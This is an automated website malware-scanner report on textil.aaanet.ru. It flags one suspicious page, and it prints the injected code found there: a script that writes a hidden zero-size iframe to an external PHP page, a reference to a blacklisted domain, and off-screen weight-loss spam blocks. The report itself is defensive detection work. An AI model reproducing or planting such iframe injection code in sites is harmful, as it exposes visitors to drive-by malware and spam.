New scan:

Malware Scanner report for textil.aaanet.ru

Malicious/Suspicious/Total urls checked
0/1/31
1 page has suspicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/1/2
1 suspicious iframe found. See details below
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://www.textil.aaanet.ru/
200 OK
Content-Length: 18905
Content-Type: text/plain
suspicious
Page code contains blacklisted domain: antiviruse-shop.ru

...[869 bytes skipped]...
evel = error_reporting(0);
?>
<script type="text/javascript"> var isMSIE = /*@cc_on!@*/false; var isFF = window.sidebar; if (isMSIE || isFF) document.write('<iframe src="http://utkarshavidyalaya.org/css/css_old/bindex.php" width="0" height="0" frameborder="0"></iframe>'); </script>
<html>
<head>
<html>
<script language="JavaScript"> = 'http://antiviruse-shop.ru/';</script>
<div id="ehxpb" style="left: -4072px; position:absolute">
86. <h2>Great weight loss pills</h2>.
.
<p>One single medication may help you forget about such a notion as excess weight!</p> Fssmo.
</div>
<div id="juwzo" style="left: -5015px; position:absolute">
3. <h2>Fat loss supplements</h2>.
.
<p>If slender waist is what you are dreaming about than this letter is what
...[3184 bytes skipped]...

Hidden iFrame found.
size: 0x0     
src: http://utkarshavidyalaya.org/css/css_old/bindex.php

<iframe src="http://utkarshavidyalaya.org/css/css_old/bindex.php" width="0" height="0" frameborder="0">

http://howhigh.xz.lt/pub/counter.js
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 21 Apr 2015 11:41:29 GMT
Location: http://www.serveriai.lt/talpinimas.html
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
Status: 301
clean
http://www.serveriai.lt/talpinimas.html
200 OK
Content-Length: 10955
Content-Type: text/html
clean
http://www.serveriai.lt/
200 OK
Content-Length: 7807
Content-Type: text/html
clean
http://www.serveriai.lt//www.iv.lt/jquery/js/jquery.js/
HTTP/1.1 302 Found
Connection: close
Date: Tue, 21 Apr 2015 11:41:29 GMT
Location: http://www.serveriai.lt/
Server: Apache
Vary: Accept-Encoding
Content-Length: 208
Content-Type: text/html; charset=iso-8859-1
clean
http://www.serveriai.lt/test404page.js
HTTP/1.1 302 Found
Connection: close
Date: Tue, 21 Apr 2015 11:41:29 GMT
Location: http://www.serveriai.lt/
Server: Apache
Vary: Accept-Encoding
Content-Length: 208
Content-Type: text/html; charset=iso-8859-1
clean
http://www.serveriai.lt//www.iv.lt/jquery/js/notice.jquery.js/
HTTP/1.1 302 Found
Connection: close
Date: Tue, 21 Apr 2015 11:41:29 GMT
Location: http://www.serveriai.lt/
Server: Apache
Vary: Accept-Encoding
Content-Length: 208
Content-Type: text/html; charset=iso-8859-1
clean
http://www.serveriai.lt//www.googleadservices.com/pagead/conversion.js/
HTTP/1.1 302 Found
Connection: close
Date: Tue, 21 Apr 2015 11:41:29 GMT
Location: http://www.serveriai.lt/
Server: Apache
Vary: Accept-Encoding
Content-Length: 208
Content-Type: text/html; charset=iso-8859-1
clean
http://www.serveriai.lt//www.iv.lt/statistika.php?type=last_order&service=svetain%EBs+talpinimas+ir+el.+pa%F0tas/
HTTP/1.1 302 Found
Connection: close
Date: Tue, 21 Apr 2015 11:41:29 GMT
Location: http://www.serveriai.lt/
Server: Apache
Vary: Accept-Encoding
Content-Length: 208
Content-Type: text/html; charset=iso-8859-1
clean
http://howhigh.xz.lt//www.iv.lt/dokumentai/talpinimas.pdf/
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 21 Apr 2015 11:41:30 GMT
Location: http://www.serveriai.lt/talpinimas.html
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
Status: 301
clean
http://howhigh.xz.lt/pub/srautas.html
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 21 Apr 2015 11:41:30 GMT
Location: http://www.serveriai.lt/talpinimas.html
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
Status: 301
clean
http://howhigh.xz.lt/pub/vieta.html
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 21 Apr 2015 11:41:30 GMT
Location: http://www.serveriai.lt/talpinimas.html
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
Status: 301
clean
http://howhigh.xz.lt/pub/pastas.html
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 21 Apr 2015 11:41:30 GMT
Location: http://www.serveriai.lt/talpinimas.html
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
Status: 301
clean
http://howhigh.xz.lt/pub/php.html
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 21 Apr 2015 11:41:30 GMT
Location: http://www.serveriai.lt/talpinimas.html
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
Status: 301
clean
http://howhigh.xz.lt/pub/mysql.html
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 21 Apr 2015 11:41:30 GMT
Location: http://www.serveriai.lt/talpinimas.html
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
Status: 301
clean
http://howhigh.xz.lt/pub/reseller.html
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 21 Apr 2015 11:41:30 GMT
Location: http://www.serveriai.lt/talpinimas.html
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
Status: 301
clean
http://howhigh.xz.lt/pub/multi-domain.html
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 21 Apr 2015 11:41:30 GMT
Location: http://www.serveriai.lt/talpinimas.html
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
Status: 301
clean
http://howhigh.xz.lt/pub/programos.html
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 21 Apr 2015 11:41:30 GMT
Location: http://www.serveriai.lt/talpinimas.html
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
Status: 301
clean
http://howhigh.xz.lt/pub/ssl.html
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 21 Apr 2015 11:41:30 GMT
Location: http://www.serveriai.lt/talpinimas.html
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
Status: 301
clean
http://howhigh.xz.lt/pub/kopijos.html
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 21 Apr 2015 11:41:30 GMT
Location: http://www.serveriai.lt/talpinimas.html
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
Status: 301
clean
http://howhigh.xz.lt/pub/nuolaida.html
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 21 Apr 2015 11:41:30 GMT
Location: http://www.serveriai.lt/talpinimas.html
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
Status: 301
clean
http://howhigh.xz.lt/pub/neribojami.html
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 21 Apr 2015 11:41:30 GMT
Location: http://www.serveriai.lt/talpinimas.html
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
Status: 301
clean
http://howhigh.xz.lt/pub/profesionalus.html
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 21 Apr 2015 11:41:30 GMT
Location: http://www.serveriai.lt/talpinimas.html
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
Status: 301
clean
http://howhigh.xz.lt/pub/dizainas.html
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 21 Apr 2015 11:41:30 GMT
Location: http://www.serveriai.lt/talpinimas.html
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
Status: 301
clean
http://howhigh.xz.lt/pub/demo/user.html
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 21 Apr 2015 11:41:30 GMT
Location: http://www.serveriai.lt/talpinimas.html
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
Status: 301
clean
http://howhigh.xz.lt/pub/demo/reseller.html
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 21 Apr 2015 11:41:30 GMT
Location: http://www.serveriai.lt/talpinimas.html
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
Status: 301
clean
http://howhigh.xz.lt/pub/talpinimas.html
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 21 Apr 2015 11:41:30 GMT
Location: http://www.serveriai.lt/talpinimas.html
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
Status: 301
clean
http://howhigh.xz.lt/pub/domenai.html
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 21 Apr 2015 11:41:30 GMT
Location: http://www.serveriai.lt/talpinimas.html
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
Status: 301
clean
http://howhigh.xz.lt/pub/klientams.html
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 21 Apr 2015 11:41:30 GMT
Location: http://www.serveriai.lt/talpinimas.html
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
Status: 301
clean
http://howhigh.xz.lt/pub/pirkti.php
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 21 Apr 2015 11:41:30 GMT
Location: http://www.serveriai.lt/talpinimas.html
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
Status: 301
clean
http://www.reconstructing.me/is.js
200 OK
Content-Length: 299
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: textil.aaanet.ru

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: textil.aaanet.ru
Referer: http://www.google.com/search?q=textil.aaanet.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=textil.aaanet.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://textil.aaanet.ru/

Result: textil.aaanet.ru is not infected or malware details are not published yet.